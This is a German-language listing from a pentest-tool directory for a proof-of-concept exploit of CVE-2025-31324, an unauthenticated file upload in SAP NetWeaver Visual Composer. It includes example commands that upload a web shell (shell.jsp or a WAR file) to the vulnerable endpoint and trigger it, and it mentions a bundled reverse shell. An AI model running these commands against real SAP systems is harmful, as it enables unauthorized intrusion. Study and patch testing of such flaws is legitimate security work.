Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-31324_PoC — Proof-of-Concept für CVE-2025-31324: Nicht authentifizierter Upload im SAP NetWeaver Visual Composer Metadata Uploader | Kitploit
Tools/GitHubGitHub/odst-forge/cve-2025-31324_poc
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubodst-forge/cve-2025-31324_poc

CVE-2025-31324_PoC

Proof-of-Concept für CVE-2025-31324: Nicht authentifizierter Upload im SAP NetWeaver Visual Composer Metadata Uploader

Repository anzeigen
62vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-31324_PoC

Proof-of-Concept für CVE-2025-31324: Unangemeldeter Upload im SAP NetWeaver Visual Composer Metadata Uploader

Dieses Skript führt Folgendes aus:

  1. Datei-Upload an den verwundbaren Endpunkt (über Upload-Host/Port)
  2. Optionaler Trigger über HTTP GET (über Trigger-Host/Port)
  3. Grundlegende Antwortvalidierung/-protokollierung

Verwendungsbeispiel: python3 PoC.py
--host sap.example.com --port 50000
--endpoint /irj/portal/sap/bc/webdynpro/sap/ZWDC_METADATA_UPLDR
--file EvilPayload.war
--trigger-path /irj/portal/irj/servlet_jsp/irj/root/EvilPayload/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https true
--bypass-portal

python3 PoC.py --host sap.example.com --port 50000
--endpoint /developmentserver/metadatauploader
--file shell.jsp
--trigger-path /visual_composer/shell.jsp
--trigger-host sap.example.com --trigger-port 50001 --trigger-https

Sie haben außerdem die Möglichkeit, eine .war-Datei hochzuladen, falls Sie auf diese Weise ausführen möchten. cache.jsp ist eine Reverse Shell, die Ihnen Zugriff verschafft, sobald Sie im System sind. (An einigen Problemen wird noch gearbeitet)

Haftungsausschluss

Dies dient ausschließlich Bildungszwecken und sollte nicht für böswillige Aktivitäten verwendet werden. Stellen Sie stets sicher, dass Sie über die erforderlichen Berechtigungen verfügen und befolgen Sie ethische Richtlinien beim Testen oder Recherchieren von Sicherheitslücken.

Bei Fragen oder Unklarheiten können Sie sich gerne melden. Bleiben Sie sicher und geschützt!

Tool herunterladen